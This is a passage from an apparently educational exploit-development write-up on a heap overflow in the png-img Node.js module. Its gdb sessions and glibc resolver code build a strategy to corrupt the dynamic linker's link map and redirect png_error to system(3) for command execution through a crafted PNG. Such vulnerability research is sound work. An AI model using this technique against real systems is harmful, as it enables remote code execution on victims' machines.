0x00007ffff401d986 in png_error@plt () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d986 <png_error@plt+6>:    pushq  $0x11d
(gdb) si
0x00007ffff401d98b in png_error@plt () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d98b <png_error@plt+11>:   jmpq   0x7ffff401c7a0
(gdb) si
0x00007ffff401c7a0 in ?? () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401c7a0:      pushq  0x257862(%rip)        # 0x7ffff4274008
(gdb) si
0x00007ffff401c7a6 in ?? () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401c7a6:      jmpq   *0x257864(%rip)        # 0x7ffff4274010
(gdb) si
_dl_runtime_resolve_xsavec () at ../sysdeps/x86_64/dl-trampoline.h:71
71      ../sysdeps/x86_64/dl-trampoline.h: No such file or directory.
1: x/i $pc
=> 0x7ffff7dec7a0 <_dl_runtime_resolve_xsavec>: push   %rbx
(gdb)


Here we see png_error@plt jump through the GOT jump slot back into an invocation of the resolver by way of the PLT. The linker is responsible for resolving and fixing up the png_error GOT jump slot so that future invocations go directly to png_error at the right location. This is how lazy linking works in a nutshell.
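
The flow we just stepped through can be modeled in a few lines of C. This is only a toy sketch of the idea, not how the dynamic linker is implemented: got_slot, resolver_stub, real_target and call_via_plt are hypothetical names standing in for the GOT jump slot, the PLT-to-resolver path, png_error and the PLT entry respectively.

```c
/* Toy model of lazy binding. All names are illustrative only. */
typedef int (*fn_t)(int);

int resolve_count = 0;

/* Stands in for the real function (png_error in our case). */
int real_target(int x) { return x + 1; }

/* Stands in for the PLT -> runtime resolver path. */
int resolver_stub(int x);

/* The "GOT jump slot": before the first call it points back at the
   resolver path instead of at the real function. */
fn_t got_slot = resolver_stub;

int resolver_stub(int x)
{
    resolve_count++;          /* the slow path only runs on the first call */
    got_slot = real_target;   /* fix up the slot, like the linker would */
    return got_slot(x);       /* continue into the resolved function */
}

/* Every call goes through the slot, like the indirect jmpq in the PLT. */
int call_via_plt(int x) { return got_slot(x); }
```

The first call_via_plt invocation takes the resolver path and patches the slot; later invocations go straight to real_target. The slot has to stay writable for this to work, which is exactly what an attacker cares about.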

The fact that the png-img library is using lazy linking for on-demand symbol resolving also tells us that it only has partial Relocation Read Only (RELRO) enabled. If we recall from our earlier mitigation check on the base Node.js binary, it has full RELRO enabled. When full RELRO is enabled, the GOT section for a given binary is marked read only to prevent attackers from replacing function pointer values in the GOT. Full RELRO implies that all dynamically linked functions have to be resolved and relocated by the linker at binary load time, since updating the GOT at runtime will no longer be possible. Resolving everything up front costs load time, which is why you often see library code compiled with partial RELRO.

gef➤  checksec
[+] checksec for '/home/anticomputer/node_modules/png-img/build/Release/png_img.node'
Canary                        : ✓
NX                            : ✓
PIE                           : ✓
Fortify                       : ✓
RelRO                         : Partial
gef➤

So to recap, our base node binary is not a PIE, but has full RELRO enabled, and our target png-img library has partial RELRO. Our heap overwrite has corrupted memory that is used by the dynamic linker to resolve functions for the png-img library, and we have also overwritten the png_ptr application specific data used by the libpng code bundled with png-img. We noted that png_ptr is passed as the first argument to this previously unresolved png_error function.

So far there are two obvious routes for exploitation. We can attempt to trigger a heap layout that gets the linker data out of the way and pursue our original plan of hijacking a png_ptr function pointer, or we can attempt to subvert the dynamic linker resolver logic.

This is where things get somewhat less deterministic. Our heap layout control is based on a static PNG file that we provide to png-img. We can allocate the data_ array as a multiple of the image width, since the vulnerability allows us to trigger a 32-bit integer wraparound using the width and the height of the image.

Let’s revisit the vulnerable code:

void PngImg::InitStorage_() {
    rowPtrs_.resize(info_.height, nullptr);
[1]
    data_ = new png_byte[info_.height * info_.rowbytes];


[2]
    for(size_t i = 0; i < info_.height; ++i) {
        rowPtrs_[i] = data_ + i * info_.rowbytes;
    }
}

At [1] the size of data_ is the result of the integer wraparound. That means we can make the data_ size any multiple of rowbytes using the low word of height. E.g. if we wanted data_ to be 8 bytes, we could set rowbytes to 8 and height to ((0xffffffff/8)+1)+1 = 0x20000001.

gef➤  p/x ((0xffffffff/8)+1)+1
$2 = 0x20000001
gef➤  p/x 0x20000001 * 8
$3 = 0x8
gef➤
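
The same arithmetic can be expressed as a small C helper. This is a sketch under stated assumptions: it treats both operands as 32-bit values, as described above, and height_for_wrapped_size only handles a rowbytes value that is a power of two (so that it divides 2^32 evenly). Both function names are made up for illustration.

```c
#include <stdint.h>

/* Size that ends up being allocated when height * rowbytes wraps at
   32 bits. Unsigned 32-bit arithmetic wraps modulo 2^32. */
uint32_t wrapped_alloc_size(uint32_t height, uint32_t rowbytes)
{
    return height * rowbytes;
}

/* Height that wraps exactly once and leaves `target` bytes.
   Assumption of this sketch: rowbytes is a power of two >= 2 and
   target is a non-zero multiple of rowbytes. Returns 0 otherwise. */
uint32_t height_for_wrapped_size(uint32_t target, uint32_t rowbytes)
{
    int power_of_two = rowbytes >= 2 && (rowbytes & (rowbytes - 1)) == 0;

    if (!power_of_two || target == 0 || target % rowbytes != 0)
        return 0;

    /* 2^32 / rowbytes rows wrap the product back to zero; the extra
       target / rowbytes rows are what remains after the wrap. */
    return (uint32_t)(UINT64_C(0x100000000) / rowbytes) + target / rowbytes;
}
```

For rowbytes 8 and a target of 8 bytes this reproduces the 0x20000001 height from the gdb session above.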

That means that we have a reasonable amount of control over where in the heap we park the data_ chunk by virtue of controlling its allocation size in a fairly granular manner. However, we don’t have much else in the way of control over heap allocation ordering. If we had more control over how and when allocations and deallocations occur in our target process, then we might also consider attacking the system (glibc) allocator itself. But, given our mitigation restrictions it is unlikely that we would be able to meet a reasonable threshold of exploit reliability for our PoC exploit without sufficient allocator influence. One avenue we could explore is playing around with additional PNG Chunks to massage the heap into a beneficial state prior to triggering our memory corruption, but we’ll leave that as an option if our initial exploration turns out to be a dead end.

As a developer, it is important to understand that attackers will explore vulnerabilities according to the resources and time they’re willing to invest in their exploitation. Even for a relatively straightforward vulnerability such as the png-img heap overflow, we see there is a distinct attacker calculus at play that weighs the pros and cons of various attack strategies against your code. Mitigations are considered from both a platform-specific and goal-oriented perspective.

Deciding on a final exploitation strategy

To figure out how to best position the data_ array prior to triggering our heap memory overwrite, let’s examine the state of the heap. So far we have two targets we are tentatively interested in: the png_ptr structure and the dynamic linker data that the runtime resolver is acting on.

If we examine the heap chunk that the png_ptr structure data is located in we note that it is a main arena chunk of size 0x530:

Thread 1 "node" hit Breakpoint 2, 0x00007ffff40309b4 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
gef➤  i r rdi
rdi            0x2722ef0        0x2722ef0
gef➤  heap chunk $rdi
Chunk(addr=0x2722ef0, size=0x530, flags=PREV_INUSE)
Chunk size: 1328 (0x530)
Usable size: 1320 (0x528)
Previous chunk size: 25956 (0x6564)
PREV_INUSE flag: On
IS_MMAPPED flag: Off
NON_MAIN_ARENA flag: Off


gef➤

We’ve already examined the png_ptr structure and how it might be used to subvert the node process. Let’s now take a closer look at what’s going on with _dl_fixup and exactly why we’re crashing in the resolver code.

When we trigger our crash, we note the following:

0x00007ffff7de2fb2 in _dl_fixup (l=0x2722a10, reloc_arg=0x11d) at ../elf/dl-runtime.c:69
69        const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
gef➤  p *l
$5 = {
  l_addr = 0x4141414141414141,
...
  l_info = {0x4141414141414141 <repeats 76 times>},
...
}
gef➤  p l
$6 = (struct link_map *) 0x2722a10
gef➤

What this means is that we’ve corrupted the linkmap used to resolve functions for the png-img library. The linkmap is a data structure that contains all the information the dynamic linker needs to be able to perform runtime resolving and relocation.

If we take a look at the linkmap heap chunk and data structure prior to any corruption it looks as follows:

gef➤  heap chunk 0x2722a10
Chunk(addr=0x2722a10, size=0x4e0, flags=PREV_INUSE)
Chunk size: 1248 (0x4e0)
Usable size: 1240 (0x4d8)
Previous chunk size: 39612548531313 (0x240703e24471)
PREV_INUSE flag: On
IS_MMAPPED flag: Off
NON_MAIN_ARENA flag: Off


gef➤  p *l
$7 = {
  l_addr = 0x7ffff400f000,
  l_name = 0x2718010 "/home/anticomputer/node_modules/png-img/build/Release/png_img.node",
  l_ld = 0x7ffff4271c40,
  l_next = 0x0,
  l_prev = 0x7ffff7ffd9f0 <_rtld_global+2448>,
  l_real = 0x2722a10,
  l_ns = 0x0,
  l_libname = 0x2722e88,
  l_info = {0x0, 0x7ffff4271c70, 0x7ffff4271d50, 0x7ffff4271d40, 0x0, 0x7ffff4271d00, 0x7ffff4271d10, 0x7ffff4271d80, 0x7ffff4271d90, 0x7ffff4271da0, 0x7ffff4271d20, 0x7ffff4271d30, 0x7ffff4271c90, 0x7ffff4271ca0, 0x7ffff4271c80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271d60, 0x0, 0x0, 0x7ffff4271d70, 0x0, 0x7ffff4271cb0, 0x7ffff4271cd0, 0x7ffff4271cc0, 0x7ffff4271ce0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271dc0, 0x7ffff4271db0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271de0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271dd0, 0x0 <repeats 25 times>, 0x7ffff4271cf0},
...
}
gef➤

When we examine the addresses and sizes for both the png_ptr chunk and the linkmap chunk, we note that they are adjacent to each other in contiguous memory. The png_ptr chunk is located at address 0x2722ef0 and the linkmap chunk of size 0x4e0 is located right before it at address 0x2722a10. There are no chunks located in between the two in terms of contiguous memory.

When evaluating the heap state from an attacker perspective, we are always considering both the contiguous memory layout as well as the logical memory layout in terms of e.g. linked lists.

Because both the linkmap and the png_ptr allocations occur before we can start influencing the target node process, and they are both in use for the duration of our exploitation attempt, it seems unlikely that we’ll be able to wiggle our data_ chunk in between these two chunks for an unhindered corruption of the png_ptr data. It may be possible to influence the early heap state through e.g. PNG file sizes, but this seems unlikely to yield reliable results.

The implication here is that we’ll have to pursue the corruption of the linkmap to leverage our desired control over the node process.

Attacking the runtime resolver

As attackers we regularly have to distill unintended, yet useful, behaviors out of system code. The challenge here is to not get sidetracked by the things we don’t care about, and focus on leveraging the behaviors that serve us as an attacker in a given exploitation scenario.

So what are the behaviors of the runtime resolver code that might be useful to us as an attacker?

To answer this question we have to understand how the runtime resolver uses the linkmap. In a nutshell, it will grab the loaded library base address out of the linkmap, and then consult a variety of binary sections to determine the correct offset from the library base to the start address for the function to be resolved. Once it figures out what this offset is, it simply adds the offset to the library base, updates the GOT entry for the function with the resolved function address and jumps to the start of the resolved function.

As an attacker, we distill the following useful primitive out of this: providing a crafted linkmap to the dynamic linker’s runtime resolver lets us add two things together and redirect execution to the resulting address. The first operand of the addition is supplied directly from the linkmap, and the second operand to the addition is determined by indexing into binary sections for which we provide pointers from the linkmap. We note that the resolved value is written into a memory location prior to the execution being redirected, based on data contained in one of the dereferenced binary sections.

Subverting the dynamic linker for attacker purposes is not a new idea. So-called “ret2dlresolve” attacks are a popular way of redirecting execution into a desired libc function without knowing where libc itself is located in memory. The concept was publicly discussed in Nergal’s “The advanced return-into-lib(c) exploits: PaX case study” Phrack paper.

When the PLT is at a known location for a targeted binary, as is the case with non-PIE binaries, ret2dlresolve attacks are an attractive option to redirect execution into arbitrary library offsets without having to know where the desired destination library is actually loaded into memory. The resolver code does the hard work for you.

The mainstream approach to abusing the runtime resolver generally assumes an attacker is already able to redirect execution for the process and is returning into the resolver code via the PLT to provide attacker controlled arguments to _dl_runtime_resolve. Hence the name “ret2dlresolve” (return to dl resolve). The idea is that they can then use the resolver’s interaction with existing or crafted linkmap data and relocation data to derive an attacker controlled offset to an existing pointer value in memory. For example, they may trick the resolver into applying an attacker controlled offset to an already established libc address to offset from there to an arbitrary libc function, such as system(3). Simpler variants use the resolver logic to resolve libc functions in scenarios where the libc base is not known and a direct return to libc is not possible.

Variations on this theme include providing a fully crafted linkmap at known locations in memory with relative addressing to fake relocation and symbol data. The goal, again, is to abuse the runtime resolver to offset from a known memory location into a location that the attacker wants to divert execution to.

However, while in our scenario we are able to provide a crafted linkmap, we do not control the arguments to the runtime resolver. We also do not have execution control yet, but rather aim to subvert the runtime resolver to provide us with both an ASLR bypass as well as execution redirection by means of our crafted linkmap data. Because the heap base is randomized and we are attacking the process through a PNG file with no way of leaking the location of our linkmap, the only memory layout and content assumptions we can make are based on the non-PIE node binary.

To get a better handle on how we might be able to achieve our attacker goals, let’s take a look at _dl_fixup as it’s intended to work. All code references are based on glibc-2.27.

elf/dl-runtime.c:


#ifndef reloc_offset
# define reloc_offset reloc_arg
# define reloc_index  reloc_arg / sizeof (PLTREL)
#endif


/* This function is called through a special trampoline from the PLT the
   first time each PLT entry is called.  We must perform the relocation
   specified in the PLT of the given shared object, and return the resolved
   function address to the trampoline, which will restart the original call
   to that address.  Future calls will bounce directly from the PLT to the
   function.  */


DL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
           ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
           struct link_map *l, ElfW(Word) reloc_arg)
{
  const ElfW(Sym) *const symtab
    = (const void *) D_PTR (l, l_info[DT_SYMTAB]);
  const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);


[1]
  const PLTREL *const reloc
    = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
[2]
  const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
  const ElfW(Sym) *refsym = sym;
[3]
  void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
  lookup_t result;
  DL_FIXUP_VALUE_TYPE value;


  /* Sanity check that we're really looking at a PLT relocation.  */
  assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);


   /* Look up the target symbol.  If the normal lookup rules are not
      used don't look in the global scope.  */
  if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
    {
      const struct r_found_version *version = NULL;


      if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
        {
          const ElfW(Half) *vernum =
            (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
          ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
          version = &l->l_versions[ndx];
          if (version->hash == 0)
            version = NULL;
        }


      /* We need to keep the scope around so do some locking.  This is
         not necessary for objects which cannot be unloaded or when
         we are not using any threads (yet).  */
      int flags = DL_LOOKUP_ADD_DEPENDENCY;
      if (!RTLD_SINGLE_THREAD_P)
        {
          THREAD_GSCOPE_SET_FLAG ();
          flags |= DL_LOOKUP_GSCOPE_LOCK;
        }


#ifdef RTLD_ENABLE_FOREIGN_CALL
      RTLD_ENABLE_FOREIGN_CALL;
#endif


      result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
                                    version, ELF_RTYPE_CLASS_PLT, flags, NULL);


      /* We are done with the global scope.  */
      if (!RTLD_SINGLE_THREAD_P)
        THREAD_GSCOPE_RESET_FLAG ();


#ifdef RTLD_FINALIZE_FOREIGN_CALL
      RTLD_FINALIZE_FOREIGN_CALL;
#endif


      /* Currently result contains the base load address (or link map)
         of the object that defines sym.  Now add in the symbol
         offset.  */
      value = DL_FIXUP_MAKE_VALUE (result,
                                   sym ? (LOOKUP_VALUE_ADDRESS (result)
                                          + sym->st_value) : 0);
    }
  else
    {
      /* We already found the symbol.  The module (and therefore its load
         address) is also known.  */
      value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
      result = l;
    }


  /* And now perhaps the relocation addend.  */
  value = elf_machine_plt_value (l, reloc, value);


  if (sym != NULL
      && __builtin_expect (ELFW(ST_TYPE) (sym->st_info) == STT_GNU_IFUNC, 0))
    value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));


  /* Finally, fix up the plt itself.  */
  if (__glibc_unlikely (GLRO(dl_bind_not)))
    return value;


  return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
}

While this code might look a little dense at first sight, the main thing for us to note is that _dl_fixup interacts with three main pointers from our controlled linkmap to resolve and relocate function addresses, all of which are pulled from the linkmap’s l_info array.

  1. l_info[DT_SYMTAB], which is a pointer to the .dynamic entry for a symbol table
  2. l_info[DT_STRTAB], which is a pointer to the .dynamic entry for a string table
  3. l_info[DT_JMPREL], which is a pointer to the .dynamic entry of an array of PLT relocation records

The .dynamic section of an ELF binary stores information about the various sections that the resolver needs to be able to get at. In our case the .dynstr (STRTAB), .dynsym (SYMTAB) and .rela.plt (JMPREL) sections are all required to resolve and relocate functions.

Dynamic entries are represented as the following structure:

typedef struct
{
  Elf64_Sxword d_tag;                        /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;                     /* Integer value */
      Elf64_Addr  d_ptr;                     /* Address value */
    } d_un;
} Elf64_Dyn;

The D_PTR macro used to access the l_info entries is defined as:

/* All references to the value of l_info[DT_PLTGOT],
  l_info[DT_STRTAB], l_info[DT_SYMTAB], l_info[DT_RELA],
  l_info[DT_REL], l_info[DT_JMPREL], and l_info[VERSYMIDX (DT_VERSYM)]
  have to be accessed via the D_PTR macro.  The macro is needed since for
  most architectures the entry is already relocated - but for some not
  and we need to relocate at access time.  */
#ifdef DL_RO_DYN_SECTION
# define D_PTR(map, i) ((map)->i->d_un.d_ptr + (map)->l_addr)
#else
# define D_PTR(map, i) (map)->i->d_un.d_ptr
#endif

Note that in most cases, D_PTR simply fetches the d_ptr field from the .dynamic section entry to retrieve the runtime relocated address of the section in question. For example, const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]); will follow the provided pointer to the .dynamic entry for the .dynstr (STRTAB) section at index DT_STRTAB of the l_info array and grab the d_ptr field of said entry.

That is a lot of back and forth in terms of pointers, but really what’s important for us to remember is that we’re not providing direct pointers to the various sections the resolver needs through our control of the l_info array in the linkmap, but rather pointers to (supposed) .dynamic entries which at offset +8 should contain a pointer to the section in question.
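
To make the double indirection concrete, here is a minimal C sketch. It uses a local stand-in for Elf64_Dyn (dyn_entry) so that it does not depend on elf.h, and it only models the D_PTR variant without DL_RO_DYN_SECTION. The helper names d_ptr_of and d_ptr_offset are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for Elf64_Dyn, mirroring the layout shown above. */
typedef struct {
    int64_t d_tag;          /* dynamic entry type */
    union {
        uint64_t d_val;     /* integer value */
        uint64_t d_ptr;     /* address value: where the section lives */
    } d_un;
} dyn_entry;

/* What D_PTR boils down to when DL_RO_DYN_SECTION is not defined:
   follow the pointer stored in l_info[...], then read d_ptr behind it. */
uint64_t d_ptr_of(const dyn_entry *l_info_slot)
{
    return l_info_slot->d_un.d_ptr;
}

/* The section pointer is read at this byte offset from whatever
   address we place in the l_info slot. */
size_t d_ptr_offset(void)
{
    return offsetof(dyn_entry, d_un);
}
```

In other words, any known address whose following 8-byte word holds a useful pointer can play the role of a .dynamic entry, regardless of what the d_tag word in front of it contains.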

So now that we know how we may provide fake binary sections to the resolver from our crafted linkmap data, let’s take a quick look at the actual resolve and relocate logic in _dl_fixup.

Relocation records are defined as follows on our test platform:

elf.h:


typedef struct
{
  Elf64_Addr   r_offset;        /* Address */
  Elf64_Xword  r_info;            /* Relocation type and symbol index */
  Elf64_Sxword r_addend;        /* Addend */
} Elf64_Rela;

Symbols are defined as follows on our test platform:

elf.h:


typedef struct
{
  Elf64_Word    st_name;                /* Symbol name (string tbl index) */
  unsigned char st_info;                /* Symbol type and binding */
  unsigned char st_other;               /* Symbol visibility */
  Elf64_Section st_shndx;               /* Section index */
  Elf64_Addr    st_value;               /* Symbol value */
  Elf64_Xword   st_size;                /* Symbol size */
} Elf64_Sym;

We’ll refer back to the _dl_fixup code and note that at [1] the reloc_arg parameter to _dl_fixup is used as an index into the relocation record table to fetch a relocation record. This relocation record provides a reloc->r_info field which, by way of a macro, splits into a Symbol table index in its high 32 bits and a relocation type in its low 32 bits.
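
The r_info split is simple enough to sketch directly. The two helpers below perform the same shift and mask as the ELF64_R_SYM and ELF64_R_TYPE macros from elf.h; the names r_info_sym and r_info_type are ours.

```c
#include <stdint.h>

/* High 32 bits of r_info: index into the symbol table. */
uint32_t r_info_sym(uint64_t r_info)
{
    return (uint32_t)(r_info >> 32);
}

/* Low 32 bits of r_info: relocation type. */
uint32_t r_info_type(uint64_t r_info)
{
    return (uint32_t)(r_info & 0xffffffff);
}
```

For example, the Info value that readelf reports for png_error in this module, 0x011000000007, splits into symbol index 0x110 and relocation type 7, which is R_X86_64_JUMP_SLOT on x86-64.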

At [2] _dl_fixup fetches the appropriate symbol entry out of the symbol table using the relocation record’s reloc->r_info index, and pending an ELF_MACHINE_JMP_SLOT type assertion on reloc->r_info and a Symbol lookup scope check on sym->st_other, the actual function resolution takes place in a very straightforward way. First the function address is resolved by adding the l->l_addr field from the linkmap and the Symbol table entry’s sym->st_value field together. The resolved value is then written into rel_addr which is derived at [3] as the result of adding l->l_addr and reloc->r_offset together.

The l->l_addr field of the linkmap is supposed to hold the base address for the loaded library to which any resolved offsets are added.

To summarize, sym->st_value + l->l_addr is the address of the resolved function and l->l_addr + reloc->r_offset is the relocation target, i.e. the GOT entry, which is updated with the resolved function address.
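
Stripped of everything else, the arithmetic in that summary looks like the sketch below. It models only the path where the symbol is treated as already found (the else branch in _dl_fixup) and ignores the lookup, the addend and IFUNC handling. fixup_result and model_fixup are hypothetical names.

```c
#include <stdint.h>

typedef struct {
    uint64_t target;     /* address that execution is redirected to */
    uint64_t rel_addr;   /* address that receives the resolved pointer */
} fixup_result;

/* Simplified model of the two additions _dl_fixup performs with
   values taken from the linkmap, symbol entry and relocation record. */
fixup_result model_fixup(uint64_t l_addr, uint64_t st_value, uint64_t r_offset)
{
    fixup_result r;

    r.target   = l_addr + st_value;   /* resolved function address */
    r.rel_addr = l_addr + r_offset;   /* relocation target, i.e. GOT entry */
    return r;
}
```

With an untampered linkmap, l_addr is the library base and both results land inside the library. Once we control all three inputs, both the write location and the jump destination are ours to choose, within the constraints discussed next.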

So, from our attacker perspective, since we control l->l_addr, as well as the .dynamic section pointers to the symbol table and relocation records, we should be able to use this to redirect execution into something useful.

Caveats

We know we can fully control the linkmap, but we do not control the reloc_arg parameter passed via the hardcoded PLT arguments to the resolver code, which in our case is 0x11d (285) for png_error. This value is intended to be an index into the relocation section (.rela.plt) of the png-img module.

anticomputer@dc1:~$ readelf -r ~/node_modules/png-img/build/Release/png_img.node
…
Relocation section '.rela.plt' at offset 0x9410 contains 378 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
…
000000263900  011000000007 R_X86_64_JUMP_SLO 000000000001cae0 png_error + 0
...

We also don’t know where in memory our corrupted linkmap lives. The heap base is randomized so the only known data we have available to us is due to the non-PIE nature of the node binary on our test platform. This prevents us from crafting fake sections at known locations in memory to use in conjunction with our crafted linkmap.

Caveats aside, we’ve now arrived at the fun part: strategizing about how we can combine our heap memory control with our knowledge of the resolver and the targeted binary to redirect execution.

We’ll make our stated goal to execute an arbitrary command as the result of loading a malicious PNG with png-img.

Brainstorming towards arbitrary command execution

We recall that the png_ptr chunk is adjacent to the linkmap chunk. The first field of the linkmap is the l_addr field, which is supposed to be the base address of the library to which the various relocation and function offsets are added.

We can overwrite heap data with a granularity of rowbytes, which is simply the width of our PNG image. The smallest rowbytes value that libpng will accept in combination with a wrapping height value is 3. That means that the smallest heap overwrite step we can take is 3 bytes per row iteration. We could, on a little endian platform, feasibly overwrite the least significant byte(s) of the linkmap’s l_addr field to make png_error resolve outside its intended function start address, without corrupting any of the other pointers in the linkmap. However, that precludes us from controlling the png_ptr argument at the time of the misaligned png_error call, since controlling this data requires a full linkmap overwrite to reach it. As it turns out, there are not enough useful instructions near png_error to pivot into control of the process otherwise. Due to ASLR we cannot go for more aggressive partial overwrites of l_addr, since we quickly collide with the entropy region of the library base address, and we only get a single try to succeed.

So, back to the drawing board.

Ideally we craft a scenario in which we can provide an arbitrary relocation record for the png_error reloc index of 285. This would then allow us to fully control the symbol index into a (fake) symbol table.

We could use node’s GOT section, which contains many already resolved libc pointers, as a fake symbol table, such that our crafted relocation record indexes into the node GOT in a way that grabs an existing libc address as a symbol’s sym->st_value. We can then use our control of l->l_addr to offset from this existing libc address and redirect execution to any other libc .text section address we desire.

Since we can control the png_ptr data which is loaded into the rdi register (i.e. the first argument according to the System V AMD64 ABI in use on 64-bit Intel Linux platforms) at the time of the png_error resolve, we can feasibly resolve to system(3) and supply an arbitrary command to execute from our control of the png_ptr data.

Since the relocation offset for the final fixup would also be controlled from our crafted relocation record, we can simply account for the l->l_addr value being added to it and point it to some safe memory location to survive the relocation fixup before taking control of the process.

This would be an ideal scenario. The challenge is: how do we provide arbitrary relocation records when we do not have controlled data at known locations nor control over the reloc_arg?

A shaky eureka

One possible answer to our puzzle lies in the fact that l_info[DT_JMPREL] is obtained as a dereference via a pointer to the .dynamic section. If you recall we noted that the resolver does not obtain direct references to the various sections it needs access to, but rather grabs a pointer to the .dynamic entry for the desired section and then consults its d_ptr field to obtain the actual pointer to the section in question.

More plainly, the resolver will use our controlled pointer for l_info[DT_JMPREL] and at offset 8 from that pointer, it will grab another pointer value which is supposed to be the actual section address.

How does this help us?

Well, we said we can park the data_ chunk anywhere on the heap, but we were not able to reliably squeeze it in between the linkmap and png_ptr chunks. But what if we placed it somewhere far in front of the linkmap chunk? This would result in a considerable heap overwrite and subsequent control of heap contents.

At the time of exploitation, our heap interaction is limited in the sense that there are not many allocations or deallocations occurring. We are in a loop that simply writes rows of our controlled data across the heap until it runs out of row data, and then the resolver logic for png_error kicks in.

So, at least in our PoC scenario, we can effectively rewrite quite a bit of the heap right up until we need to take control without too many stability issues.

We also know that we’re dealing with a non-PIE binary. So we know where its .data section is located. In the node .data section there will exist a multitude of structures that may have pointers that point into the heap during runtime. If we overwrite a large enough section of the heap, some of those pointers will now point to data we control and those pointers will exist at static locations in the .data section.

So, what if we repurpose one of these .data locations to act as our .dynamic entry pointer for l_info[DT_JMPREL]? We might be able to use this to provide a fully controlled relocation record to _dl_fixup. Since on our target platform relocation records are size 24 (3 x 8 bytes), and the png_error reloc_arg is 285, as long as we can place a properly aligned relocation record at offset 285 x 24 from a node .data fetched heap pointer, we should be able to subvert the resolver logic.
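
The placement requirement can be written down as a tiny C sketch. rela_record is a local stand-in for Elf64_Rela, and reloc_record_offset is a hypothetical helper that follows the index times record size calculation described above.

```c
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for Elf64_Rela: three 8-byte fields, 24 bytes total. */
typedef struct {
    uint64_t r_offset;   /* address */
    uint64_t r_info;     /* relocation type and symbol index */
    int64_t  r_addend;   /* addend */
} rela_record;

/* Byte offset, relative to the (fake) relocation table base, of the
   record that a given reloc_arg selects. */
size_t reloc_record_offset(uint32_t reloc_arg)
{
    return (size_t)reloc_arg * sizeof(rela_record);
}
```

For the png_error reloc_arg of 0x11d this gives 285 x 24 = 6840 (0x1ab8) bytes, so our crafted record has to sit at exactly that distance past wherever the repurposed heap pointer ends up pointing.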

Subsequently, we can use a similar approach to find a static location that at +8 contains a pointer to the node binary GOT, and use that as our l_info[DT_SYMTAB] .dynamic entry pointer. In concert with the crafted relocation record we can index into the node GOT to grab an existing libc pointer value, and use our crafted linkmap’s l_addr field as a delta to a desired libc function, in our case system(3).

Putting it all together

Now that we have a proposed exploitation strategy, we have to gather all the ingredients to put our plan of attack into action.

The downside of our current strategy, from an exploitation reliability perspective, is that it is highly binary dependent and highly heap layout sensitive. As such we mark this as a PoC effort at best. It depends on a non-PIE node binary, which is less and less common, as well as a predictable heap offset from the data_ chunks to the linkmap and png_ptr chunks.

Having said that, in terms of exploiting a blind, one shot, heap overflow on a reasonably modern system with almost all standard mitigations turned on, it makes for a useful exercise to reach our desired finish line.

For our proposed strawberry pudding to come together, we need the following ingredients:

  1. A data_ chunk size that will park our overflow chunk in front of the linkmap chunk
  2. The offset between our data_ chunk and linkmap chunk
  3. A suitable libc pointer from the node binary GOT to offset from
  4. A known node pointer to a pointer to the node GOT base
  5. A known node pointer to a pointer to controlled heap memory
  6. The offset from the source libc pointer to our target libc function pointer
  7. A safe memory region to receive the final _dl_fixup relocation write

First let’s find a suitable free chunk that we can park our data_ chunk into at the time of the PngImg::PngImg constructor being invoked. We can use gef’s heap bins command to show us which bins have free chunks available and where in memory they are located.

We are looking for a chunk that’s at a significant offset from where the linkmap chunk will be, so that we have a good chance of being able to provide controlled reloc records from the heap via node .data heap pointers. But, we also don’t want to corrupt the entirety of the heap for fear of instability.

We can find a seemingly suitable free chunk of size 0x2010 in the unsorted bin:

─────────────────────────────────────── Unsorted Bin for arena 'main_arena' ───────────────────────────────────────
[+] unsorted_bins[0]: fw=0x271f0b0, bk=0x272c610
 →   Chunk(addr=0x271f0c0, size=0x2010, flags=PREV_INUSE)   →   Chunk(addr=0x2722ef0, size=0x1b30, flags=PREV_INUSE)   →   Chunk(addr=0x2717400, size=0x430, flags=PREV_INUSE)   →   Chunk(addr=0x272c620, size=0x4450, flags=PREV_INUSE)
[+] Found 4 chunks in unsorted bin.

By setting data_ size to 0x2010, we can squeeze into this free chunk that lives at offset 0x3950 from what will ultimately be our linkmap chunk. Of course this assumption would be highly unstable in any real world scenario, but it’ll hold for the purposes of our exercise.

We’ll use a rowbytes (width) value of 16 so that we have a nicely aligned and granular write primitive for our heap overwrite.
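
With a fixed row size, the distances involved translate directly into row counts. The helper below is a sketch that assumes the chunk addresses observed on our test run; rows_until is a hypothetical name.

```c
#include <stdint.h>

/* Number of full rows written, starting at `start`, before the
   overwrite reaches `target`. Returns 0 when the target lies before
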